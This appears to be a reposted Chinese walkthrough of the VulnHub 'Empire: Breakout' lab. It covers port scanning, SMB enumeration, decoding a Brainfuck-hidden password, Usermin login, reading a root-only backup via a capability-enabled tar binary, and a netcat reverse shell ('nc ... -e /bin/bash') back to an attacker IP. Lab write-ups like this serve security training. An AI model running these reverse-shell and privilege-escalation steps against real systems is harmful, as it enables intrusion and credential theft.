攻防靶场(21):EMPIRE BREAKOUT

admin 2024年10月25日15:35:12评论20 views字数 2059阅读6分51秒阅读模式

目录

1. 侦查 Reconnaissance
    1.1 IP地址
    1.2 端口和服务
3. 初始访问 Initial Access
    3.1 普通用户帐号
    3.2 普通用户密码
    3.3 web权限
    3.4 server权限
6. 权限提升 Privilege Escalation
    6.1 特权用户密码
    6.2 root权限(方式1)
    6.3 root权限(方式2)

7. 攻击路径总结

靶场下载地址:https://www.vulnhub.com/entry/empire-breakout,751/

1. 侦查 Reconnaissance

1.1 IP地址

部署好环境,直接看到IP地址:192.168.20.135

攻防靶场(21):EMPIRE BREAKOUT

1.2 端口和服务

全端口扫描TCP协议,获得80、139、445、10000、20000端口

sudo nmap 192.168.20.135 -n -Pn -p- --reason

攻防靶场(21):EMPIRE BREAKOUT

3. 初始访问 Initial Access

3.1 普通用户帐号

对139和445端口的smb服务进行信息收集

num4linux -a 192.168.20.135

攻防靶场(21):EMPIRE BREAKOUT

有用的信息只有一个用户名:cyber

攻防靶场(21):EMPIRE BREAKOUT

3.2 普通用户密码

访问80端口,查看源代码,得到一个字符串

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

攻防靶场(21):EMPIRE BREAKOUT

放到网上一搜,是一种叫Brainfuck Language的编程语言

攻防靶场(21):EMPIRE BREAKOUT

随便找个提供执行环境的网站,执行这串代码,输出了一个长得像密码的字符串:.2uqPEfj3D<P'a-3

攻防靶场(21):EMPIRE BREAKOUT

3.3 web权限

帐号和密码都有了,现在就找登录框,进行密码喷洒攻击

10000端口是Webmin登录页,20000端口是Usermin登录页,最后就Usermin登录成功了

攻防靶场(21):EMPIRE BREAKOUT

3.4 server权限

Usermin后台有服务器的命令执行环境,真是踏破铁鞋无觅处

攻防靶场(21):EMPIRE BREAKOUT

查看当前目录下的文件,有个user.txt,里面是flag:3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

攻防靶场(21):EMPIRE BREAKOUT

6. 权限提升 Privilege Escalation

6.1 特权用户密码

按照套路该提权了,查看当前目录下的文件,有个tar程序,有cap_dac_read_search权限,任何用户都能用该程序打包自己没有read权限的文件,这有什么用呢?

如果特权用户使用tar程序解包,解包后的文件属主将保持不变,原来是zabbix解包后还是zabbix

如果普通用户使用tar程序解包,解包后的文件属主将和普通用户一样,原来是root解包后就成了普通用户了,原来没权限看的文件现在就有权限看了

攻防靶场(21):EMPIRE BREAKOUT

正常思路是查看/etc/shadow文件,然后爆破密钥获得root密码,但这里实在爆破不出来,过程就不截图了

其他思路是查看敏感文件,比如管理员的密码本。翻找服务器,发现一个/var/backups/.old_pass.bak文件,当前cyber用户没有read权限

攻防靶场(21):EMPIRE BREAKOUT

先去一个有write权限的目录执行打包解包,比如/tmp/或/home/cyber/都行

攻防靶场(21):EMPIRE BREAKOUT

相关命令是(下图黄色部分)

1、打包:/home/cyber/tar -cvf 1.tar /var/backups/.old_pass.bak
2、解包:/home/cyber/tar -xvf 1.tar(解包用/bin/tar是一样的)

3、查看:cat /tmp/var/backups/.old_pass.bak

相关权限是(下图红色部分)

1、未打包的文件:root/root
2、被打包的文件:root/root

3、解包后的文件:cyber/cyber

攻防靶场(21):EMPIRE BREAKOUT

成功拿到了密码:Ts&4&YurgtRX(=~h

6.2 root权限(方式1)

但是Usermin限制了su命令的使用,无法切换到root,服务器也没开放22端口

攻防靶场(21):EMPIRE BREAKOUT

先将shell权限反弹出来,摆脱Usermin的限制,再su切换用户试试

nc -nvlp 1234

nc -nv 192.168.20.132 1234 -e /bin/bash

攻防靶场(21):EMPIRE BREAKOUT

攻防靶场(21):EMPIRE BREAKOUT

成功su切换到root用户

攻防靶场(21):EMPIRE BREAKOUT

6.3 root权限(方式2)

当然也能在Usermin中退出cyber帐号,再以root帐号登录,就能获得root权限了

攻防靶场(21):EMPIRE BREAKOUT

攻防靶场(21):EMPIRE BREAKOUT

在/root/目录下的rOOt.txt文件获得flag:3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

攻防靶场(21):EMPIRE BREAKOUT

7. 攻击路径总结

公众号后台回复“20241025”获取该思维导图的.xmind格式源文件

攻防靶场(21):EMPIRE BREAKOUT

原文始发于微信公众号(OneMoreThink):攻防靶场(21):EMPIRE BREAKOUT

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月25日15:35:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   攻防靶场(21):EMPIRE BREAKOUThttps://cn-sec.com/archives/3312343.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息